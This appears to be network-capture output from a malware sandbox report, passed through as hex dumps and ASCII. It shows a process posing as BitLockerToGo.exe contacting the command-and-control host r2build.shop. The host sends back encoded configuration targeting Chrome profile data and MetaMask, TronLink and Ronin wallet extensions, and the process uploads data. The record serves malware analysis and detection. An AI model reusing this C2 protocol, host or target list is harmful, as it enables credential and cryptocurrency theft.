                                                                                                                                                                                                                                    2025-01-09 13:01:30 UTC12303INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6e 6f 31 31 31 70 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74
                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @no111p</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    1192.168.2.44973794.130.191.1824433428C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2025-01-09 13:01:31 UTC185OUTGET / HTTP/1.1
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                    Host: r2build.shop
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    2025-01-09 13:01:31 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Thu, 09 Jan 2025 13:01:31 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    2025-01-09 13:01:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    2192.168.2.44973894.130.191.1824433428C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2025-01-09 13:01:32 UTC277OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----16890r168glf3ekf37qi
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                    Host: r2build.shop
                                                                                                                                                                                                                                    Content-Length: 255
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    2025-01-09 13:01:32 UTC255OUTData Raw: 2d 2d 2d 2d 2d 2d 31 36 38 39 30 72 31 36 38 67 6c 66 33 65 6b 66 33 37 71 69 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 32 45 31 31 37 39 39 46 39 34 32 31 35 36 31 32 32 34 37 34 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 31 36 38 39 30 72 31 36 38 67 6c 66 33 65 6b 66 33 37 71 69 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 30 66 30 38 35 31 62 31 66 38 31 35 37 38 38 61 34 66 34 31 37 65 34 36 36 64 39 62 37 30 30 0d 0a 2d 2d 2d 2d 2d 2d 31 36 38 39 30 72 31 36 38 67 6c 66 33 65 6b 66 33 37 71 69 2d 2d 0d 0a
                                                                                                                                                                                                                                    Data Ascii: ------16890r168glf3ekf37qiContent-Disposition: form-data; name="hwid"C2E11799F942156122474-a33c7340-61ca------16890r168glf3ekf37qiContent-Disposition: form-data; name="build_id"30f0851b1f815788a4f417e466d9b700------16890r168glf3ekf37qi--
                                                                                                                                                                                                                                    2025-01-09 13:01:33 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Thu, 09 Jan 2025 13:01:32 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    2025-01-09 13:01:33 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 63 66 32 39 34 61 37 64 62 30 31 30 31 64 30 65 31 63 65 32 31 61 37 35 61 33 64 37 35 63 61 34 7c 31 7c 30 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 3a1|1|1|1|cf294a7db0101d0e1ce21a75a3d75ca4|1|0|1|0|0|50000|10


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    3192.168.2.44973994.130.191.1824433428C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2025-01-09 13:01:33 UTC277OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----sr16890r1dbsrqq9rqie
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                    Host: r2build.shop
                                                                                                                                                                                                                                    Content-Length: 331
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    2025-01-09 13:01:33 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 73 72 31 36 38 39 30 72 31 64 62 73 72 71 71 39 72 71 69 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 66 32 39 34 61 37 64 62 30 31 30 31 64 30 65 31 63 65 32 31 61 37 35 61 33 64 37 35 63 61 34 0d 0a 2d 2d 2d 2d 2d 2d 73 72 31 36 38 39 30 72 31 64 62 73 72 71 71 39 72 71 69 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 30 66 30 38 35 31 62 31 66 38 31 35 37 38 38 61 34 66 34 31 37 65 34 36 36 64 39 62 37 30 30 0d 0a 2d 2d 2d 2d 2d 2d 73 72 31 36 38 39 30 72 31 64 62 73 72 71 71 39 72 71 69 65 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                    Data Ascii: ------sr16890r1dbsrqq9rqieContent-Disposition: form-data; name="token"cf294a7db0101d0e1ce21a75a3d75ca4------sr16890r1dbsrqq9rqieContent-Disposition: form-data; name="build_id"30f0851b1f815788a4f417e466d9b700------sr16890r1dbsrqq9rqieCont
                                                                                                                                                                                                                                    2025-01-09 13:01:34 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Thu, 09 Jan 2025 13:01:34 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    2025-01-09 13:01:34 UTC2192INData Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46
                                                                                                                                                                                                                                    Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    4192.168.2.44974094.130.191.1824433428C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2025-01-09 13:01:35 UTC277OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----w4euaaa1vkf37ymycj5f
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                    Host: r2build.shop
                                                                                                                                                                                                                                    Content-Length: 331
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    2025-01-09 13:01:35 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 77 34 65 75 61 61 61 31 76 6b 66 33 37 79 6d 79 63 6a 35 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 66 32 39 34 61 37 64 62 30 31 30 31 64 30 65 31 63 65 32 31 61 37 35 61 33 64 37 35 63 61 34 0d 0a 2d 2d 2d 2d 2d 2d 77 34 65 75 61 61 61 31 76 6b 66 33 37 79 6d 79 63 6a 35 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 30 66 30 38 35 31 62 31 66 38 31 35 37 38 38 61 34 66 34 31 37 65 34 36 36 64 39 62 37 30 30 0d 0a 2d 2d 2d 2d 2d 2d 77 34 65 75 61 61 61 31 76 6b 66 33 37 79 6d 79 63 6a 35 66 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                    Data Ascii: ------w4euaaa1vkf37ymycj5fContent-Disposition: form-data; name="token"cf294a7db0101d0e1ce21a75a3d75ca4------w4euaaa1vkf37ymycj5fContent-Disposition: form-data; name="build_id"30f0851b1f815788a4f417e466d9b700------w4euaaa1vkf37ymycj5fCont
                                                                                                                                                                                                                                    2025-01-09 13:01:35 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Thu, 09 Jan 2025 13:01:35 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    2025-01-09 13:01:35 UTC5837INData Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                                                    Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    5192.168.2.44974194.130.191.1824433428C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2025-01-09 13:01:36 UTC277OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----90hln79r900zuaiekxt0
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                    Host: r2build.shop
                                                                                                                                                                                                                                    Content-Length: 332
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    2025-01-09 13:01:36 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 39 30 68 6c 6e 37 39 72 39 30 30 7a 75 61 69 65 6b 78 74 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 66 32 39 34 61 37 64 62 30 31 30 31 64 30 65 31 63 65 32 31 61 37 35 61 33 64 37 35 63 61 34 0d 0a 2d 2d 2d 2d 2d 2d 39 30 68 6c 6e 37 39 72 39 30 30 7a 75 61 69 65 6b 78 74 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 30 66 30 38 35 31 62 31 66 38 31 35 37 38 38 61 34 66 34 31 37 65 34 36 36 64 39 62 37 30 30 0d 0a 2d 2d 2d 2d 2d 2d 39 30 68 6c 6e 37 39 72 39 30 30 7a 75 61 69 65 6b 78 74 30 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                    Data Ascii: ------90hln79r900zuaiekxt0Content-Disposition: form-data; name="token"cf294a7db0101d0e1ce21a75a3d75ca4------90hln79r900zuaiekxt0Content-Disposition: form-data; name="build_id"30f0851b1f815788a4f417e466d9b700------90hln79r900zuaiekxt0Cont
                                                                                                                                                                                                                                    2025-01-09 13:01:37 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Thu, 09 Jan 2025 13:01:36 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    2025-01-09 13:01:37 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    6192.168.2.44974294.130.191.1824433428C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2025-01-09 13:01:37 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----db168q168q1djeua1n7q
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                    Host: r2build.shop
                                                                                                                                                                                                                                    Content-Length: 5573
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    2025-01-09 13:01:37 UTC5573OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 36 38 71 31 36 38 71 31 64 6a 65 75 61 31 6e 37 71 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 66 32 39 34 61 37 64 62 30 31 30 31 64 30 65 31 63 65 32 31 61 37 35 61 33 64 37 35 63 61 34 0d 0a 2d 2d 2d 2d 2d 2d 64 62 31 36 38 71 31 36 38 71 31 64 6a 65 75 61 31 6e 37 71 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 30 66 30 38 35 31 62 31 66 38 31 35 37 38 38 61 34 66 34 31 37 65 34 36 36 64 39 62 37 30 30 0d 0a 2d 2d 2d 2d 2d 2d 64 62 31 36 38 71 31 36 38 71 31 64 6a 65 75 61 31 6e 37 71 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                    Data Ascii: ------db168q168q1djeua1n7qContent-Disposition: form-data; name="token"cf294a7db0101d0e1ce21a75a3d75ca4------db168q168q1djeua1n7qContent-Disposition: form-data; name="build_id"30f0851b1f815788a4f417e466d9b700------db168q168q1djeua1n7qCont
                                                                                                                                                                                                                                    2025-01-09 13:01:38 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Thu, 09 Jan 2025 13:01:38 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    2025-01-09 13:01:38 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    7192.168.2.44974394.130.191.1824433428C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2025-01-09 13:01:38 UTC277OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----db168q168q1djeua1n7q
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                    Host: r2build.shop
                                                                                                                                                                                                                                    Content-Length: 489
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    2025-01-09 13:01:38 UTC489OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 36 38 71 31 36 38 71 31 64 6a 65 75 61 31 6e 37 71 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 66 32 39 34 61 37 64 62 30 31 30 31 64 30 65 31 63 65 32 31 61 37 35 61 33 64 37 35 63 61 34 0d 0a 2d 2d 2d 2d 2d 2d 64 62 31 36 38 71 31 36 38 71 31 64 6a 65 75 61 31 6e 37 71 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 30 66 30 38 35 31 62 31 66 38 31 35 37 38 38 61 34 66 34 31 37 65 34 36 36 64 39 62 37 30 30 0d 0a 2d 2d 2d 2d 2d 2d 64 62 31 36 38 71 31 36 38 71 31 64 6a 65 75 61 31 6e 37 71 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                    Data Ascii: ------db168q168q1djeua1n7qContent-Disposition: form-data; name="token"cf294a7db0101d0e1ce21a75a3d75ca4------db168q168q1djeua1n7qContent-Disposition: form-data; name="build_id"30f0851b1f815788a4f417e466d9b700------db168q168q1djeua1n7qCont
                                                                                                                                                                                                                                    2025-01-09 13:01:39 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Thu, 09 Jan 2025 13:01:39 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    2025-01-09 13:01:39 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    8192.168.2.449749142.250.185.1004437064C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2025-01-09 13:01:41 UTC607OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                    Host: www.google.com
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                    2025-01-09 13:01:41 UTC1266INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Date: Thu, 09 Jan 2025 13:01:41 GMT
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    Expires: -1
                                                                                                                                                                                                                                    Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                    Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                    Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-6_80G5RcZVrD4YU7XuQVaQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                    Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                    Permissions-Policy: unload=()
                                                                                                                                                                                                                                    Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                    Server: gws
                                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                    Accept-Ranges: none
                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    2025-01-09 13:01:41 UTC124INData Raw: 38 66 38 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 74 69 6b 74 6f 6b 20 62 61 6e 6e 65 64 22 2c 22 67 65 6e 65 72 61 6c 20 68 6f 73 70 69 74 61 6c 20 73 70 6f 69 6c 65 72 73 20 6d 69 63 68 61 65 6c 22 2c 22 66 69 6e 73 70 61 6e 20 66 69 73 68 22 2c 22 63 65 73 20 32 30 32 35 20 74 65 63 68 6e 6f 6c 6f 67 79 22 2c 22 6e 65 77 20 79 6f 72 6b 20 67 69 61 6e 74 73 22 2c 22 77
                                                                                                                                                                                                                                    Data Ascii: 8f8)]}'["",["tiktok banned","general hospital spoilers michael","finspan fish","ces 2025 technology","new york giants","w
